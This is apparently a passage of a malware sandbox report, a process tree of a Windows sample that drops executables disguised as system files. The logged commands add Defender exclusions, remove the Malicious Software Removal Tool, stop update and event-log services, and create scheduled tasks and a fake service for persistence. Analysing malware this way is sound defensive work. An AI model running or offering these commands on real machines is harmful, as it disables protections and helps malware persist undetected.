                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: DSCG-EV6C
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          PID:2968
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 928N-H5PH
                                                                        4⤵
                                                                          PID:2248
                                                                          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                            C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 928N-H5PH
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            PID:1824
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 6G1J-TZP8
                                                                          4⤵
                                                                            PID:1180
                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 6G1J-TZP8
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              PID:2076
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: EFFL-5NA7
                                                                            4⤵
                                                                              PID:2932
                                                                              • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: EFFL-5NA7
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                PID:2956
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: 9MG6-CCS3
                                                                              4⤵
                                                                                PID:2024
                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: 9MG6-CCS3
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:2264
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: NK9I-PAZB
                                                                                4⤵
                                                                                  PID:568
                                                                                  • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                    C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: NK9I-PAZB
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2572
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: 0B68-8E99
                                                                                  4⤵
                                                                                    PID:2000
                                                                                    • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                      C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: 0B68-8E99
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2256
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: FGDU-114E
                                                                                    4⤵
                                                                                      PID:768
                                                                                      • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                        C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: FGDU-114E
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:2900
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: OTL5-IUZE
                                                                                      4⤵
                                                                                        PID:2136
                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: OTL5-IUZE
                                                                                          5⤵
                                                                                            PID:808
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: 2T1P-ULHC
                                                                                          4⤵
                                                                                            PID:1292
                                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: 2T1P-ULHC
                                                                                              5⤵
                                                                                                PID:496
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 58F6-3GII
                                                                                              4⤵
                                                                                                PID:1040
                                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 58F6-3GII
                                                                                                  5⤵
                                                                                                    PID:2664
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: OOMS-7M9M
                                                                                                  4⤵
                                                                                                    PID:316
                                                                                                    • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                      C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: OOMS-7M9M
                                                                                                      5⤵
                                                                                                        PID:1060
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: L7CD-6BLC
                                                                                                      4⤵
                                                                                                        PID:2040
                                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: L7CD-6BLC
                                                                                                          5⤵
                                                                                                            PID:3004
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: G807-T5NN
                                                                                                          4⤵
                                                                                                            PID:2752
                                                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: G807-T5NN
                                                                                                              5⤵
                                                                                                                PID:2584
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: O0DG-ALOB
                                                                                                              4⤵
                                                                                                                PID:2156
                                                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: O0DG-ALOB
                                                                                                                  5⤵
                                                                                                                    PID:1980
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: ZNOG-AIVP
                                                                                                                  4⤵
                                                                                                                    PID:2472
                                                                                                                    • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                      C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: ZNOG-AIVP
                                                                                                                      5⤵
                                                                                                                        PID:2512
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: SZRH-M8IL
                                                                                                                      4⤵
                                                                                                                        PID:1244
                                                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: SZRH-M8IL
                                                                                                                          5⤵
                                                                                                                            PID:2448
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 5GE0-LB60
                                                                                                                          4⤵
                                                                                                                            PID:1644
                                                                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 5GE0-LB60
                                                                                                                              5⤵
                                                                                                                                PID:2784
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: R41S-CK0F
                                                                                                                              4⤵
                                                                                                                                PID:2244
                                                                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: R41S-CK0F
                                                                                                                                  5⤵
                                                                                                                                    PID:2052
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: 90MH-4AOO
                                                                                                                                  4⤵
                                                                                                                                    PID:1208
                                                                                                                                    • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                      C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: 90MH-4AOO
                                                                                                                                      5⤵
                                                                                                                                        PID:1748
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: CFGG-5ADG
                                                                                                                                      4⤵
                                                                                                                                        PID:2412
                                                                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: CFGG-5ADG
                                                                                                                                          5⤵
                                                                                                                                            PID:2104
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: FJ40-3HOL
                                                                                                                                          4⤵
                                                                                                                                            PID:2832
                                                                                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: FJ40-3HOL
                                                                                                                                              5⤵
                                                                                                                                                PID:1992
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
                                                                                                                                              4⤵
                                                                                                                                                PID:1664
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
                                                                                                                                                4⤵
                                                                                                                                                  PID:1588
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
                                                                                                                                                  4⤵
                                                                                                                                                    PID:2100
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
                                                                                                                                                    4⤵
                                                                                                                                                      PID:1228
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
                                                                                                                                                      4⤵
                                                                                                                                                        PID:2696
                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                                                                                                        4⤵
                                                                                                                                                          PID:2560
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
                                                                                                                                                          4⤵
                                                                                                                                                            PID:1124
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe"
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                          PID:884
                                                                                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                            "C:\Windows\System32\WScript.exe" "C:\ChainReview\4N7V2tIOe7KSQ8eET3YGuCyK2Y.vbe"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:2076
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                cmd /c ""C:\ChainReview\8xoM57ln5l3nWVEqwKA0TDOQ0Am35EOuQMtKP.bat" "
                                                                                                                                                                5⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:3012
                                                                                                                                                                • C:\ChainReview\sphyperRuntimedhcpSvc.exe
                                                                                                                                                                  "C:\ChainReview/sphyperRuntimedhcpSvc.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  PID:2032
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\csrss.exe'
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    PID:2904
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\services.exe'
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    PID:2916
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\Ole DB\fr-FR\conhost.exe'
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    PID:2528
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\taskhost.exe'
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    PID:2572
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Libraries\Idle.exe'
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    PID:2656
                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\S4RsEMd8uM.bat"
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:2100
                                                                                                                                                                      • C:\Windows\system32\chcp.com
                                                                                                                                                                        chcp 65001
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:1956
                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                          ping -n 10 localhost
                                                                                                                                                                          8⤵
                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                          PID:1784
                                                                                                                                                                        • C:\MSOCache\All Users\services.exe
                                                                                                                                                                          "C:\MSOCache\All Users\services.exe"
                                                                                                                                                                          8⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:1240
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\conhostsft.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\conhostsft.exe"
                                                                                                                                                                3⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                PID:2740
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\.conhostsft.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\.conhostsft.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                  PID:2084
                                                                                                                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                    PID:2664
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:1016
                                                                                                                                                                      • C:\Windows\system32\wusa.exe
                                                                                                                                                                        wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                        PID:1700
                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                      C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                      PID:2904
                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                      C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                      PID:1460
                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                      C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                      PID:844
                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                      C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                      PID:2648
                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                      C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                      PID:2444
                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:2748
                                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:2512
                                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:2492
                                                                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:2960
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe delete "driverupdate"
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:2884
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:1272
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:2360
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe start "driverupdate"
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:1776
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\ChainReview\csrss.exe'" /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2428
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\ChainReview\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2448
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\ChainReview\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2664
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\services.exe'" /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2412
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\MSOCache\All Users\services.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2452
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\services.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2472
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Common Files\System\Ole DB\fr-FR\conhost.exe'" /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:1856
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Common Files\System\Ole DB\fr-FR\conhost.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:1948
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Common Files\System\Ole DB\fr-FR\conhost.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2108
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\taskhost.exe'" /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2676
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\taskhost.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:924
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\taskhost.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:1620
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Libraries\Idle.exe'" /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:940
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Public\Libraries\Idle.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:1512
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Libraries\Idle.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:1444
                                                                                                                                                                    • C:\Windows\System32\rundll32.exe
                                                                                                                                                                      C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:2508
                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "-1235672442-4212397232400478221111045131299164281174258244323542101-238541014"
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:2640
                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "-3360437491195485465-1372112944-6318916041590017412-1044954775-219699517-164216592"
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:748
                                                                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe "-197970125412365099661032450388-2989389411640614035-248010216-1347137413-2032698800"
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:2228
                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "2074676325-17294317763710458561975973085-66896659320177733981248428095-1694072130"
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:2924
                                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe "-1375723083-154507032418671509912010101407-1368576414-418528635-11948236002088662732"
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:948
                                                                                                                                                                                • C:\ProgramData\VC_redist.x64.exe
                                                                                                                                                                                  C:\ProgramData\VC_redist.x64.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                  PID:2696
                                                                                                                                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                    PID:2304
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:352
                                                                                                                                                                                      • C:\Windows\system32\wusa.exe
                                                                                                                                                                                        wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                        PID:1840
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:2104
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:2340
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:1672
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:1596
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Launches sc.exe
